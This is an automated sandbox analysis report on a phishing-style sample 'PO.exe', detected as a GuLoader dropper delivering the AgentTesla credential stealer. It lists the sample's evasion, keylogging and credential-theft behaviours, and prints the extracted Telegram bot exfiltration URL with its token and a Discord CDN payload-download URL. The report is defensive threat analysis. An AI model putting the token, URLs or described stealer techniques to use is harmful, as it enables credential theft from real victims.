Edit tour

Windows Analysis Report
PO.exe

Overview

General Information

Sample Name:	PO.exe
Analysis ID:	756266
MD5:	9297126fd9624f7dc2d4f64f072668a2
SHA1:	c30b3c8fddd49f7dfba687026daf6293f6d90b1b
SHA256:	edd8e1858bcc704fdea75837bb448eceda61317e7f8028e82aa2a0e5559c658a
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Yara detected AgentTesla

Yara detected GuLoader

Snort IDS alert for network traffic

Installs a global keyboard hook

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Contains functionality to register a low level keyboard hook

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Creates a window with clipboard capturing capabilities

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

PO.exe (PID: 5272 cmdline: C:\Users\user\Desktop\PO.exe MD5: 9297126FD9624F7DC2D4F64F072668A2)

CasPol.exe (PID: 7240 cmdline: C:\Users\user\Desktop\PO.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "561616954", "Chat URL": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendMessage"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.89339190222.000000001D990000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000004.00000000.84958072563.0000000001110000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x31ce0:$s10: logins 0x60a68:$s10: logins 0x60b20:$s10: logins 0x60bd8:$s10: logins 0x60ca0:$s10: logins 0x60d68:$s10: logins 0x39c54:$s11: credential 0x1eca:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time 0x2498:$m2: %image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2B 0x29e4:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401 0x1feb:$m5: \WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera
Process Memory Space: CasPol.exe PID: 7240	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 7240	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 7240	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: CasPol.exe PID: 7240	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x6a680:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time 0x6c968:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time 0x6ac4e:$m2: %image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2B 0x6cf35:$m2: %image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2B 0x6b19a:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401 0x6d481:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401 0x6a7a1:$m5: \WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera 0x6ca89:$m5: \WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera
Click to see the 6 entries

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.11.20 - Destination IP: 149.154.167.220

Timestamp:	192.168.11.20149.154.167.220498544432851779 11/29/22-22:50:36.593124
SID:	2851779
Source Port:	49854
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: GET /attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 00000004.00000002.89346370502.000000001DDA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 00000004.00000003.86340018468.00000000222CC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89340222421.000000001D9FA000.00000004.00000800.00020000.00000000.sdmp, Cookies.4.dr	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: Cookies.4.dr	String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)

Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 00000004.00000002.89339798750.000000001D9D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bLCeYs.com
Source: CasPol.exe, 00000004.00000002.89318154724.0000000001563000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.85166822571.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000004.00000002.89318154724.0000000001563000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.85166822571.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: PO.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89340758768.000000001DA29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: CasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocumentdocument-----
Source: CasPol.exe, 00000004.00000002.89316980207.00000000014CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: CasPol.exe, 00000004.00000002.89334284519.000000001C8F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocx
Source: CasPol.exe, 00000004.00000002.89317391968.0000000001506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocxT
Source: CasPol.exe, 00000004.00000002.89317391968.0000000001506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocxt
Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/8
Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89339798750.000000001D9D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sFTel9k7EYFPshk.com
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sFTel9k7EYFPshk.comt-Wl
Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

HTTP traffic detected: POST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad25c20e8b8dfHost: api.telegram.orgContent-Length: 999Expect: 100-continueConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic

Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49854 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe

Jump to behavior

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 4_2_1C7E1010 SetWindowsHookExW 0000000D,00000000,?,?

4_2_1C7E1010

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_0040541C

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

Source: PO.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_004033B6

Source: C:\Users\user\Desktop\PO.exe

File created: C:\Windows\Handskedukker.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00406846	1_2_00406846
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00404C59	1_2_00404C59
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A6D32	1_2_032A6D32
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A0733	1_2_032A0733
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032C5308	1_2_032C5308
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A7F0D	1_2_032A7F0D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A6313	1_2_032A6313
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A0911	1_2_032A0911
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A6B6B	1_2_032A6B6B
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A7F4C	1_2_032A7F4C
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A0545	1_2_032A0545
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032C5559	1_2_032C5559
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A05A1	1_2_032A05A1
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A65B9	1_2_032A65B9
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A6B86	1_2_032A6B86
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A0784	1_2_032A0784
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032BAD9A	1_2_032BAD9A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A09EE	1_2_032A09EE
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A05F0	1_2_032A05F0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A6BC8	1_2_032A6BC8
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A67C1	1_2_032A67C1
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A07C7	1_2_032A07C7
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A802A	1_2_032A802A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A0620	1_2_032A0620
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A0A26	1_2_032A0A26
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A6C05	1_2_032A6C05
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A081A	1_2_032A081A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A0670	1_2_032A0670
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A6C4E	1_2_032A6C4E
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A6243	1_2_032A6243
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032AB2AB	1_2_032AB2AB
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A0AA9	1_2_032A0AA9
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A06AC	1_2_032A06AC
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A08BF	1_2_032A08BF
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032C648B	1_2_032C648B
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A6C91	1_2_032A6C91
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A1CEB	1_2_032A1CEB
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A06E2	1_2_032A06E2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A70E7	1_2_032A70E7
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A0AFB	1_2_032A0AFB
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032C40FA	1_2_032C40FA
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A04F2	1_2_032A04F2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A70C0	1_2_032A70C0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A1CDE	1_2_032A1CDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01044320	4_2_01044320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01043A50	4_2_01043A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01043708	4_2_01043708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010B6968	4_2_010B6968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010BC318	4_2_010BC318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010B5A08	4_2_010B5A08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010B9708	4_2_010B9708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010BC1C8	4_2_010BC1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010B81F8	4_2_010B81F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010BBAC8	4_2_010BBAC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010B3EA0	4_2_010B3EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010D0040	4_2_010D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010D90BE	4_2_010D90BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010D634C	4_2_010D634C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010DAA70	4_2_010DAA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010D4DD8	4_2_010D4DD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010D5F70	4_2_010D5F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010DF600	4_2_010DF600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010D0032	4_2_010D0032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010DB3D2	4_2_010DB3D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_010D46C0	4_2_010D46C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01136829	4_2_01136829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_0146B439	4_2_0146B439
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01462768	4_2_01462768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01461FF0	4_2_01461FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_0146DE78	4_2_0146DE78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01461AC1	4_2_01461AC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1C7EE9E0	4_2_1C7EE9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1C7E6C88	4_2_1C7E6C88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1C7E83C8	4_2_1C7E83C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1D6C5E08	4_2_1D6C5E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1D6C46C4	4_2_1D6C46C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1D6C5D20	4_2_1D6C5D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1D6C6AF1	4_2_1D6C6AF1

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_032C63F1 NtProtectVirtualMemory,

1_2_032C63F1

Source: C:\Users\user\Desktop\PO.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: PO.exe	Virustotal: Detection: 29%
Source: PO.exe	ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\PO.exe

File read: C:\Users\user\Desktop\PO.exe

Jump to behavior

Source: PO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO.exe C:\Users\user\Desktop\PO.exe
Source: C:\Users\user\Desktop\PO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\PO.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\PO.exe	Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

